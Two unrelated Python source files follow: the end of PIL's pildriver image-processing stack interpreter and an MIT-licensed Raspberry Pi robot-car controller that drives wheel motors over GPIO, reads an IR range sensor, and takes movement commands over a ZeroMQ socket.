"""usage: lighter <image:pic1> <image:pic2>
Pop the two top images, push an image of the lighter pixels of both.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.lighter(image1, image2))
def do_darker(self):
"""usage: darker <image:pic1> <image:pic2>
Pop the two top images, push an image of the darker pixels of both.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.darker(image1, image2))
def do_difference(self):
"""usage: difference <image:pic1> <image:pic2>
Pop the two top images, push the difference image
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.difference(image1, image2))
def do_multiply(self):
"""usage: multiply <image:pic1> <image:pic2>
Pop the two top images, push the multiplication image.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
self.push(ImageChops.multiply(image1, image2))
def do_screen(self):
"""usage: screen <image:pic1> <image:pic2>
Pop the two top images, superimpose their inverted versions.
"""
from PIL import ImageChops
image2 = self.do_pop()
image1 = self.do_pop()
self.push(ImageChops.screen(image1, image2))
def do_add(self):
"""usage: add <image:pic1> <image:pic2> <int:offset> <float:scale>
Pop the two top images, produce the scaled sum with offset.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
scale = float(self.do_pop())
offset = int(self.do_pop())
self.push(ImageChops.add(image1, image2, scale, offset))
def do_subtract(self):
"""usage: subtract <image:pic1> <image:pic2> <int:offset> <float:scale>
Pop the two top images, produce the scaled difference with offset.
"""
from PIL import ImageChops
image1 = self.do_pop()
image2 = self.do_pop()
scale = float(self.do_pop())
offset = int(self.do_pop())
self.push(ImageChops.subtract(image1, image2, scale, offset))
# ImageEnhance classes
def do_color(self):
"""usage: color <image:pic1>
Enhance color in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Color(image)
self.push(enhancer.enhance(factor))
def do_contrast(self):
"""usage: contrast <image:pic1>
Enhance contrast in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Contrast(image)
self.push(enhancer.enhance(factor))
def do_brightness(self):
"""usage: brightness <image:pic1>
Enhance brightness in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Brightness(image)
self.push(enhancer.enhance(factor))
def do_sharpness(self):
"""usage: sharpness <image:pic1>
Enhance sharpness in the top image.
"""
from PIL import ImageEnhance
factor = float(self.do_pop())
image = self.do_pop()
enhancer = ImageEnhance.Sharpness(image)
self.push(enhancer.enhance(factor))
# The interpreter loop
def execute(self, list):
"Interpret a list of PILDriver commands."
list.reverse()
while len(list) > 0:
self.push(list[0])
list = list[1:]
if self.verbose:
print("Stack: " + repr(self.stack))
top = self.top()
if not isinstance(top, str):
continue
funcname = "do_" + top
if not hasattr(self, funcname):
continue
else:
self.do_pop()
func = getattr(self, funcname)
func()
if __name__ == '__main__':
import sys
# If we see command-line arguments, interpret them as a stack state
# and execute. Otherwise go interactive.
driver = PILDriver()
if len(sys.argv[1:]) > 0:
driver.execute(sys.argv[1:])
else:
print("PILDriver says hello.")
while True:
try:
if sys.version_info[0] >= 3:
line = input('pildriver> ')
else:
line = raw_input('pildriver> ')
except EOFError:
print("\nPILDriver says goodbye.")
break
driver.execute(line.split())
print(driver.stack)
# The following sets edit modes for GNU EMACS
# Local Variables:
# mode:python
# End:
|
|
'''
The MIT License (MIT)
Copyright (c) 2014 Hu Dou
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import RPi.GPIO as gpio
import time
import sys
import zmq
import signal
import threading
# Motor control pins using BOARD numbering
left_front_wheel_forward_pin = 7
left_front_wheel_backward_pin = 11
right_front_wheel_forward_pin = 12
right_front_wheel_backward_pin = 13
left_rear_wheel_forward_pin = 15
left_rear_wheel_backward_pin = 16
right_rear_wheel_forward_pin = 18
right_rear_wheel_backward_pin = 22
# put all pins in a list for convenience
control_pins = [left_front_wheel_forward_pin, left_front_wheel_backward_pin, \
right_front_wheel_forward_pin, right_front_wheel_backward_pin, \
left_rear_wheel_forward_pin, left_rear_wheel_backward_pin,
right_rear_wheel_forward_pin, right_rear_wheel_backward_pin]
# IR range sensor (rs) pins
rs_trigger = 3
rs_input = 5
# Symbols used for the status of the car
Stopped = 1
Forward = 2
Backward = 3
LeftForward = 5
RightForward = 6
# Global variable to store the current car status
car_status = Stopped
# Lock to pretect race condition during car control and update car status
car_control_lock = threading.RLock()
def setup():
'''
Setup the GPIO pins
'''
gpio.setmode(gpio.BOARD)
gpio.setwarnings(False) # Suppress the warnings complaining that the channel has been configured ...
# motor control pins
[gpio.setup(p, gpio.OUT) for p in control_pins]
# range sensor pins
gpio.setup(rs_trigger, gpio.OUT)
gpio.setup(rs_input, gpio.IN)
# set the trigger to low as the initial condition
gpio.output(rs_trigger, gpio.LOW)
def left_front_wheel_forward():
gpio.output(left_front_wheel_forward_pin, True)
gpio.output(left_front_wheel_backward_pin, False)
def left_front_wheel_backward():
gpio.output(left_front_wheel_forward_pin, False)
gpio.output(left_front_wheel_backward_pin, True)
def right_front_wheel_forward():
gpio.output(right_front_wheel_forward_pin, True)
gpio.output(right_front_wheel_backward_pin, False)
def right_front_wheel_backward():
gpio.output(right_front_wheel_forward_pin, False)
gpio.output(right_front_wheel_backward_pin, True)
def left_rear_wheel_forward():
gpio.output(left_rear_wheel_forward_pin, True)
gpio.output(left_rear_wheel_backward_pin, False)
def left_rear_wheel_backward():
gpio.output(left_rear_wheel_forward_pin, False)
gpio.output(left_rear_wheel_backward_pin, True)
def right_rear_wheel_forward():
gpio.output(right_rear_wheel_forward_pin, True)
gpio.output(right_rear_wheel_backward_pin, False)
def right_rear_wheel_backward():
gpio.output(right_rear_wheel_forward_pin, False)
gpio.output(right_rear_wheel_backward_pin, True)
def car_forward():
with car_control_lock:
left_front_wheel_forward()
right_front_wheel_forward()
left_rear_wheel_forward()
right_rear_wheel_forward()
global car_status
car_status = Forward
def car_backward():
with car_control_lock:
left_front_wheel_backward()
right_front_wheel_backward()
left_rear_wheel_backward()
right_rear_wheel_backward()
global car_status
car_status = Backward
def car_stop():
with car_control_lock:
[gpio.output(p, False) for p in control_pins]
global car_status
car_status = Stopped
def car_left_forward():
'''
Make the car turn left forward by turning the right
wheels forward and left wheels backward
'''
with car_control_lock:
left_front_wheel_backward()
left_rear_wheel_backward()
right_front_wheel_forward()
right_rear_wheel_forward()
global car_status
car_status = LeftForward
def car_right_forward():
'''
Make the car turn right forward by turning the left
wheels forward and right wheels backward
'''
with car_control_lock:
left_front_wheel_forward()
left_rear_wheel_forward()
right_front_wheel_backward()
right_rear_wheel_backward()
global car_status
car_status = RightForward
def test():
'''
A quick test of all motions
'''
car_forward()
time.sleep(2)
car_backward()
time.sleep(2)
car_left_forward()
time.sleep(2)
car_right_forward()
time.sleep(2)
car_stop()
#######################################################
# Car control commands:
# f: forward
# b: backward
# lf: left forward
# rf: right forward
# t: stop the car
#######################################################
commands = {
'f' : car_forward,
'b' : car_backward,
'lf': car_left_forward,
'rf': car_right_forward,
't' : car_stop
}
#######################################################
# To connect to the server, run a program that implements
# a zeromq client, and send commands to the server as
# specified above.
#######################################################
def run_control_server():
'''
Run a zeromq server to receive commands from the clients
Use TCP port: 5555
Valid commands are:
car control commands
q: quit the server
'''
# flag to indicate we are stopping the server
# use a single element array so it can be used in closure
# of dist_func. Simple variable won't work
stop_server = [False]
# Start another thread to detect distance
# The main function of the thread
def dist_func():
print 'Distance detection thread started'
while not stop_server[0]:
# send a 10us pulse to the range sensor trigger
gpio.output(rs_trigger, True)
time.sleep(0.00001)
gpio.output(rs_trigger, False)
# Waiting for the echo to return
# Sleep 100us in between so I don't hog the CPU
# this gives me a 1.7cm resolution
# The max distance the sensor can detect is about
# 5 meters, which takes ~30ms for the echo to
# get back. If we still don't get the echo after
# 30ms, the distance is considered infinite, and
# I restart the loop again.
wait_for_echo_count = 0
while gpio.input(rs_input) == 0:
time.sleep(0.0001)
wait_for_echo_count += 1
if wait_for_echo_count == 300:
break
if wait_for_echo_count == 300:
print 'Distance: inf'
else:
starttime = time.time()
while gpio.input(rs_input) == 1:
time.sleep(0.0001)
stoptime = time.time()
dist = 170 * (stoptime - starttime)
print 'Distance: %.2fm' % dist
# If distance is less than 15cm, stop the car
global car_status
if dist <= 0.15:
with car_control_lock:
if car_status == Forward:
car_stop()
# sleep for a while
time.sleep(0.05)
print 'Distance detection thread stopped'
# Start the thread
dist_detection_thread = threading.Thread(target=dist_func)
dist_detection_thread.start()
context = zmq.Context()
socket = context.socket(zmq.PAIR) # Use PAIR sockets
print 'Listening to port 5555'
socket.bind('tcp://*:5555')
def sigint_handler(sig, frame):
'''
Intercept the SIGINT signal, close the socket, and exit
gracefully.
'''
print '\nReceived Ctrl-C'
print 'Closing the socket ...',
socket.close()
print 'done'
print 'Stopping distance detection thread...',
stop_server[0] = True
dist_detection_thread.join()
sys.exit(0)
# Set our own sigint handler
signal.signal(signal.SIGINT, sigint_handler)
while True:
cmd = socket.recv()
print 'Control server: received command ', cmd
if cmd in commands:
commands[cmd]()
socket.send('OK ' + cmd)
elif cmd == 'q':
car_stop() # stop the car before close
socket.send('OK. Quit')
socket.close()
context.term()
stop_server[0] = True
dist_detection_thread.join()
break
else:
socket.send('Err: Unknown command ' + cmd)
print 'Invalid command: ', cmd
if __name__ == '__main__':
setup()
if len(sys.argv) == 2 and sys.argv[1] == 'test':
test()
else:
run_control_server()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.